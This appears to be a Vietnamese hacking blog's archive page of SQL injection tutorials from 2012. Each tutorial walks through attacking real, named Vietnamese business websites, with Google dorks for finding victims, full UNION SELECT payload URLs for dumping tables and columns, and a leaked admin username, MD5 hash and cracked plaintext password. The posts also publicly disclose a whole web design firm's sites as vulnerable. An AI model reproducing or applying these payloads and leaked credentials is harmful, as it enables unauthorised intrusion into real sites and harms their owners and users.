Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Website Hacking - SQLI. Hiển thị tất cả bài đăng

Chủ Nhật, 29 tháng 7, 2012

[Bài 4 – SQLI] Bypass 406 Not Acceptable




      Trong các bài trước , Soleil đã giới thiệu các dạng attack cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với AspxKhai thác lỗi cơ bảnLỗi Jet. Tuy nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable” thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với công ty thiết kế website “Viet Arrow”.

Google dork: Designed by Viet Arrow id=

Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi sqli, sau đây là 1 số ví dụ


Soleil sẽ chọn 1 victim bất kỳ để khai thác.

Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản

Bước 1: Check lỗi

Thêm dấu ‘ vào sau con số của đường link có dạng id=
 http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi sqli

Chủ Nhật, 18 tháng 3, 2012

[Bài 3 - SQLI] - Khai Thác Đối Với ASPX




Bước 1: Check link lỗi


Đối với site aspx, ta thêm dấu  ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi: 

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.
Ví dụ:     http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ 








Thứ Hai, 12 tháng 3, 2012

Site nước ngoài Lỗi SQLI - Phần II



Thứ Bảy, 10 tháng 3, 2012

[Bài 2 - SQLI] - Khai Thác Lỗi Cơ Bản



Bước 1: Check lỗi:  

Thêm dấu sau đường link có dạng id=
Nếu giao diện website có  thay đổi. Chứng tỏ site bị lỗi.

Bước 2: Tìm số trường cột

http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 1-- -   -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 15-- - ->  Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421 order by 16-- -  -> Giao diện website thay đổi.

      Số trường  cột cần tìm là 15

Bước 3: Xác định vị trí trường cột bị lỗi

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421 thì mới xuất hiện ra các con số đẹp.





Chúng ta chú ý sẽ thấy xuất hiện các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.


Bước 4: Xuất ra tên các tables trong database

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()-- -

Thông tin về tên các table thu được:

tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor 



Table chứa thông tin về username và password là tbl_user. ( Thường là nhưng table có chữ user).  Vì vậy soleil sẽ khai thác ở table này.

Bước 5: Xuất ra tên các colums chứa username và password


http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572-- -
     Lưu ý:   
-          0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng mã hex
-          74626c5f75736572 là chữ tbl_user ở dạng hex.
-          Link convert các ký tự sang mã hex:

Thông tin về tên columns thu được:

id,uid,pwd         
                
Bước 6: Xuất ra thông tin về Username và Password

http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -

0x2f

Thông tin về username và password được mã hóa md5 thu được:
admin/679115597bf9f763506dcc9a8e9e8e82          

       

Bước 7:  Crack Password và tìm link admin:

-          Có nhiều site để crack passwd, ví dụ:
Hoặc sử dụng google để tìm kiếm
               
-          Sử dụng các tool để tìm link admin: Havij, Web admin finder
Pass dải nén: ducdung.08clc

Thông tin Soleil thu được:
Username và password:   admin /  961980dt


Thứ Sáu, 17 tháng 2, 2012

[Bài 1 - SQLI] Lỗi Jet


Trong bài đâu tiên vê chủ để SQLI, Soleil giới thiệu với các bạn lỗi Jet khá phổ biến


Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column


Một số dork dùng để tìm site dính lỗ hổng bảo mật Jet:


tintuc.asp?tin_ID=
chitiet.asp?ID=


Victim hôm nay soleil sẽ demo là:
 http://thanhancamera.com/news.asp?tin_ID=86 


Bước 1: Check lỗi


Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.
/news.asp, line 16



Thứ Năm, 16 tháng 2, 2012